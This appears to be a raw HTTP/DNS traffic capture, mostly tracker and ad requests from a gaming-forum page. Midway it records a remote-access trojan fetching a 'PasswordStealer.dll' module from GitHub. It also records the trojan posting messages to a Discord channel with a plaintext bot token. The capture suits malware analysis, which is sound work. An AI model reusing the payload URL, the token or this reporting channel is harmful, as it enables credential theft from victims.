
POST /api/v1/collect HTTP/2.0
host: a.ad.gt
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: text/plain
content-length: 668
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 204

date: Sun, 26 May 2024 02:07:04 GMT
access-control-allow-origin: https://www.se7ensins.com
access-control-allow-credentials: true
vary: Origin
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 889a35a4d89a7705-LHR
OPTIONS

https://p.ad.gt/api/v1/con

Request

OPTIONS /api/v1/con HTTP/2.0
host: p.ad.gt
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: POST
access-control-request-headers: content-type
referer: https://www.se7ensins.com/
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:07:04 GMT
content-type: text/html; charset=utf-8
allow: OPTIONS, POST
access-control-allow-origin: https://www.se7ensins.com
access-control-allow-credentials: true
access-control-allow-headers: content-type
access-control-allow-methods: DELETE, GET, HEAD, OPTIONS, PATCH, POST, PUT
vary: Origin
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 889a35a4eb900e18-AMS
content-encoding: gzip
POST

https://p.ad.gt/api/v1/con

Request

POST /api/v1/con HTTP/2.0
host: p.ad.gt
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
content-length: 1636
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:07:04 GMT
content-type: text/html; charset=utf-8
access-control-allow-origin: https://www.se7ensins.com
access-control-allow-credentials: true
vary: Origin
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 889a35a63c310e18-AMS
content-encoding: gzip
GET

https://pixels.ad.gt/api/v1/getpixels?tagger_id=5ed0ee01a8ac74b18ebb2405d3b2987b&url=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&code=%27none%27

Request

GET /api/v1/getpixels?tagger_id=5ed0ee01a8ac74b18ebb2405d3b2987b&url=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&code=%27none%27 HTTP/2.0
host: pixels.ad.gt
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
cookie: au_id=AU1D-0100-001716689186-TBCHXBQA-GKIV
te: trailers

Response

HTTP/2.0 204

date: Sun, 26 May 2024 02:07:05 GMT
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 889a35aa192d60dc-LHR
DNS

pixels.ad.gt.cdn.cloudflare.net

Request

pixels.ad.gt.cdn.cloudflare.net

IN A

Response

pixels.ad.gt.cdn.cloudflare.net

IN A

104.22.4.69

pixels.ad.gt.cdn.cloudflare.net

IN A

172.67.23.234

pixels.ad.gt.cdn.cloudflare.net

IN A

104.22.5.69
DNS

pixels.ad.gt.cdn.cloudflare.net

Request

pixels.ad.gt.cdn.cloudflare.net

IN AAAA

Response

pixels.ad.gt.cdn.cloudflare.net

IN AAAA

2606:4700:10::6816:445

pixels.ad.gt.cdn.cloudflare.net

IN AAAA

2606:4700:10::6816:545

pixels.ad.gt.cdn.cloudflare.net

IN AAAA

2606:4700:10::ac43:17ea
GET

https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/PasswordStealer.dll

Request

GET /moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/PasswordStealer.dll HTTP/1.1
Host: raw.githubusercontent.com

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 54272
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "7112266c5dad3b937e20e4c37e8c5557560abc284968341a0d1bd3d02a133db0"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BA12:1F0FF2:127A10:17F1C6:6652994B
Accept-Ranges: bytes
Date: Sun, 26 May 2024 02:07:08 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600021-LCY
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1716689228.290875,VS0,VE157
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 2569145ed98bdc62cd697e32d11c44f7fec176f9
Expires: Sun, 26 May 2024 02:12:08 GMT
Source-Age: 0
DNS

images.outbrainimg.com

Request

images.outbrainimg.com

IN A

Response

images.outbrainimg.com

IN CNAME

wildcard.outbrainimg.com.edgekey.net

wildcard.outbrainimg.com.edgekey.net

IN CNAME

e15144.d.akamaiedge.net

e15144.d.akamaiedge.net

IN A

2.21.190.8
GET

https://images.outbrainimg.com/transform/v3/eyJpdSI6IjhjMzkwOGE4YTE2MWZkOWVlNDY3YTU4NzU4NmIyYTU5YTRjZWU0MjJjMDM0OGEzMWE3YmJlNGMxOGNhOTc5NzkiLCJ3Ijo0ODAsImgiOjI0MCwiZCI6MS4wLCJjcyI6MCwiZiI6NH0.webp

Request

GET /transform/v3/eyJpdSI6IjhjMzkwOGE4YTE2MWZkOWVlNDY3YTU4NzU4NmIyYTU5YTRjZWU0MjJjMDM0OGEzMWE3YmJlNGMxOGNhOTc5NzkiLCJ3Ijo0ODAsImgiOjI0MCwiZCI6MS4wLCJjcyI6MCwiZiI6NH0.webp HTTP/2.0
host: images.outbrainimg.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

content-type: image/webp
content-length: 27352
last-modified: Mon, 20 May 2024 01:41:15 GMT
x-traceid: 6680563e5c80d02e307965c18da4bc63
strict-transport-security: max-age=31536000; includeSubDomains; preload
cache-control: max-age=2233867
date: Sun, 26 May 2024 02:07:10 GMT
timing-allow-origin: *
access-control-allow-credentials: false
access-control-allow-methods: GET,POST
access-control-allow-origin: *
timing-allow-origin: *
GET

https://images.outbrainimg.com/transform/v3/eyJpdSI6IjE5ZmIxNjA4YmM0OWFlMzkwNGE2NDI5MWVjMDQzMmI5ZWMxMDAzMmU0Y2Q4ZThmZTBjYWVmZDA4MGQzNTAwMjYiLCJ3Ijo0ODAsImgiOjI0MCwiZCI6MS4wLCJjcyI6MCwiZiI6NH0.webp

Request

GET /transform/v3/eyJpdSI6IjE5ZmIxNjA4YmM0OWFlMzkwNGE2NDI5MWVjMDQzMmI5ZWMxMDAzMmU0Y2Q4ZThmZTBjYWVmZDA4MGQzNTAwMjYiLCJ3Ijo0ODAsImgiOjI0MCwiZCI6MS4wLCJjcyI6MCwiZiI6NH0.webp HTTP/2.0
host: images.outbrainimg.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

content-type: image/webp
content-length: 12640
last-modified: Thu, 09 May 2024 08:42:01 GMT
x-traceid: 89655f6ba0cabdf45aada9320d6314f0
strict-transport-security: max-age=31536000; includeSubDomains; preload
cache-control: max-age=2071599
date: Sun, 26 May 2024 02:07:10 GMT
timing-allow-origin: *
access-control-allow-credentials: false
access-control-allow-methods: GET,POST
access-control-allow-origin: *
timing-allow-origin: *
GET

https://images.outbrainimg.com/transform/v3/eyJpdSI6ImI4YjUxMDJlZjJkZDY0YmZiYjJkMjA2YTFjNTFhYzIwZmJmOWNmZjU0M2I2MzgxNWUzZjc1ODA3ZDgyZGI4YjQiLCJ3Ijo0ODAsImgiOjI0MCwiZCI6MS4wLCJjcyI6MCwiZiI6NH0.webp

Request

GET /transform/v3/eyJpdSI6ImI4YjUxMDJlZjJkZDY0YmZiYjJkMjA2YTFjNTFhYzIwZmJmOWNmZjU0M2I2MzgxNWUzZjc1ODA3ZDgyZGI4YjQiLCJ3Ijo0ODAsImgiOjI0MCwiZCI6MS4wLCJjcyI6MCwiZiI6NH0.webp HTTP/2.0
host: images.outbrainimg.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

content-type: image/webp
content-length: 10542
last-modified: Thu, 09 May 2024 07:59:42 GMT
x-traceid: c865c9bbbc27f0f5a67ce75d40283d13
strict-transport-security: max-age=31536000; includeSubDomains; preload
cache-control: max-age=2462400
date: Sun, 26 May 2024 02:07:11 GMT
timing-allow-origin: *
access-control-allow-credentials: false
access-control-allow-methods: GET,POST
access-control-allow-origin: *
timing-allow-origin: *
DNS

e15144.d.akamaiedge.net

Request

e15144.d.akamaiedge.net

IN AAAA

Response
POST

https://discord.com/api/v9/channels/1244109081116151869/messages

Request

POST /api/v9/channels/1244109081116151869/messages HTTP/1.1
authorization: Bot MTIxNTQyMjc0OTk4ODg4NDU3Mg.G8QiY3.e2k047pCmhPxBH-tdaOfxVTB1BY3dSfZIT_sXY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 20
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sun, 26 May 2024 02:07:11 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=a9bf7ae81b0411ef850612252a6c3139; Expires=Fri, 25-May-2029 02:07:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1716689232.282
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lAOggwwe7shd9hjhEmbRIkl1a7N5Bi5EIuHgmHb%2BA4YxrPCjHGXUosEfqzY%2FF3TcPdqSz4AGFUMxFF1Hl12tGXFPYM6fGBeZILRBqRSSc2%2FFTNCvSmxtAnwGDBJs"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=a9bf7ae81b0411ef850612252a6c3139a638b4277269ef4458ce0262f668740662f1983e6d48ac9a85ef949272aee030; Expires=Fri, 25-May-2029 02:07:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=fabbbe7f9f990a06bd89c50bc6c8717fff054671-1716689231; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=qD9SXw0o.jeruTYz7idmyfFsVxvgxTF32WUF1ZaUFlE-1716689231394-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 889a35cee8b171e6-LHR
POST

https://discord.com/api/v9/channels/1244109081116151869/messages

Request

POST /api/v9/channels/1244109081116151869/messages HTTP/1.1
authorization: Bot MTIxNTQyMjc0OTk4ODg4NDU3Mg.G8QiY3.e2k047pCmhPxBH-tdaOfxVTB1BY3dSfZIT_sXY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sun, 26 May 2024 02:07:11 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=a9e92d521b0411efaa45ee42206204f4; Expires=Fri, 25-May-2029 02:07:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1716689233.281
x-ratelimit-reset-after: 1.689
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TXvS4EYXSPjM0oC%2BEmMkd2xw49d2BdvRaiUDLedy5KjezeL15wgR%2FdVpMdraE0pDIY6VZrhtYAaUH2hQay4UVRfPRVqjDfp9HCoGky62G6xHBlwb7L3uYnW80R9o"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=a9e92d521b0411efaa45ee42206204f49c9c9ae9ebc504d9d1e47720950ef87383b49925bd45ef8d7107d88d45dab5c0; Expires=Fri, 25-May-2029 02:07:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=fabbbe7f9f990a06bd89c50bc6c8717fff054671-1716689231; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=e915pGELJe1O_VjlBH0Ef8NlRBfH8uK1FWuLaCQeQTw-1716689231666-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 889a35d0defc76e1-LHR
POST

https://discord.com/api/v9/channels/1244109081116151869/messages

Request

POST /api/v9/channels/1244109081116151869/messages HTTP/1.1
authorization: Bot MTIxNTQyMjc0OTk4ODg4NDU3Mg.G8QiY3.e2k047pCmhPxBH-tdaOfxVTB1BY3dSfZIT_sXY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 40
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sun, 26 May 2024 02:07:11 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=aa09abea1b0411ef8491f6dcb56f3f60; Expires=Fri, 25-May-2029 02:07:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 2
x-ratelimit-reset: 1716689234.282
x-ratelimit-reset-after: 2.501
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Tqx8AEyWXVxXpahTZEyb9J9B1n5RUX84yxxhoFb4uao1pKY%2F3T9TJdWyCIvjGwijrVq4tmBvdQHq0Z05b4Te%2FhyomlR6hJUqZunGRZ04Vh45y6IYsJA8bV2JVyR"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=aa09abea1b0411ef8491f6dcb56f3f60d35e31713a4c05075dda89c318a772bfb803e0674da15e94142cef0f49e8aaa5; Expires=Fri, 25-May-2029 02:07:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=fabbbe7f9f990a06bd89c50bc6c8717fff054671-1716689231; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=rs_sjQiOveZpXEfyQusb7qFklGceMKa2Z_Vj76VVWjU-1716689231882-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 889a35d1fa5c76a7-LHR
DNS

log.outbrainimg.com

Request

log.outbrainimg.com

IN A

Response

log.outbrainimg.com

IN CNAME

log.outbrain.org

log.outbrain.org

IN CNAME

chidc2.outbrain.org

chidc2.outbrain.org

IN A

64.74.236.159
DNS

chidc2.outbrain.org

Request

chidc2.outbrain.org

IN AAAA

Response
DNS

159.236.74.64.in-addr.arpa

Request

159.236.74.64.in-addr.arpa

IN PTR

Response

159.236.74.64.in-addr.arpa

IN PTR

chioutbraincom
GET

https://id5-sync.com/bounce

Request

GET /bounce HTTP/2.0
host: id5-sync.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:07:20 GMT
access-control-allow-origin: https://www.se7ensins.com
vary: Origin
access-control-allow-credentials: true
p3p: CP="CAO PSA OUR"
set-cookie: id5=dcd01ab7-e5ec-714c-87c0-7676194af380#1716689240456#1; Path=/; Domain=id5-sync.com; Expires=Sat, 24 Aug 2024 02:07:20 GMT; Max-Age=7776000; SameSite=None; Secure
expires: Thu, 01 Jan 1970 00:00:00 GMT
content-type: text/plain;charset=utf-8
strict-transport-security: max-age=63072000; includeSubDomains; preload
POST

https://id5-sync.com/gm/v3

Request

POST /gm/v3 HTTP/2.0
host: id5-sync.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: text/plain
content-length: 2300
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:07:20 GMT
p3p: CP="CAO PSA OUR"
set-cookie: 3pi=; Path=/; Domain=id5-sync.com; Expires=Thu, 01 Jan 1970 00:00:00 GMT; Max-Age=0; SameSite=None; Secure
expires: Thu, 01 Jan 1970 00:00:00 GMT
set-cookie: id5=19f7f7e7-43b7-6ea3-bb37-69be1f172eaa#1716689240560#1; Path=/; Domain=id5-sync.com; Expires=Sat, 24 Aug 2024 02:07:20 GMT; Max-Age=7776000; SameSite=None; Secure
access-control-allow-origin: https://www.se7ensins.com
vary: Origin
access-control-allow-credentials: true
content-type: application/json
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://id5-sync.com/i/882/8.gif?o=api&id5id=ID5*ewCEtpInI8wMdhUmKeaid6pU_78z0513ypCfOFSr7DCiBZgLvCszxFvkQVDumifBodiPZ7pNmhqEfWVNEWnGKaHJ99wOHSCOdzdFP6JPtLGh_HKsAusYQ2LXuDLX7Jfmod1qVEdALo4OftOa7XVGbaHt009wU9kq3iOHiiyMxJSjTqt8M3y8HwZEEwlk64rQog8SbMVy_vf5X543fFdnzw&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdpr=true

Request

GET /i/882/8.gif?o=api&id5id=ID5*ewCEtpInI8wMdhUmKeaid6pU_78z0513ypCfOFSr7DCiBZgLvCszxFvkQVDumifBodiPZ7pNmhqEfWVNEWnGKaHJ99wOHSCOdzdFP6JPtLGh_HKsAusYQ2LXuDLX7Jfmod1qVEdALo4OftOa7XVGbaHt009wU9kq3iOHiiyMxJSjTqt8M3y8HwZEEwlk64rQog8SbMVy_vf5X543fFdnzw&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdpr=true HTTP/2.0
host: id5-sync.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 302

vary: Origin
vary: Access-Control-Request-Method
vary: Access-Control-Request-Headers
p3p: CP="CAO PSA OUR"
set-cookie: cf=; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Domain=id5-sync.com; Path=/; SameSite=None; Secure
set-cookie: cip=; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Domain=id5-sync.com; Path=/; SameSite=None; Secure
set-cookie: cnac=; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Domain=id5-sync.com; Path=/; SameSite=None; Secure
set-cookie: car=; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Domain=id5-sync.com; Path=/; SameSite=None; Secure
set-cookie: gdpr=; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Domain=id5-sync.com; Path=/; SameSite=None; Secure
set-cookie: gpp=; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Domain=id5-sync.com; Path=/; SameSite=None; Secure
set-cookie: id5=1f7cb354-d78d-7fed-a1f0-332a52ab21cf#1716689240638#1; Max-Age=300; Expires=Sun, 26-May-2024 02:12:20 GMT; Domain=id5-sync.com; Path=/; SameSite=None; Secure
set-cookie: callback=; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Domain=id5-sync.com; Path=/; SameSite=None; Secure
location: https://id5-sync.com/c/882/0/8/1.gif?gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA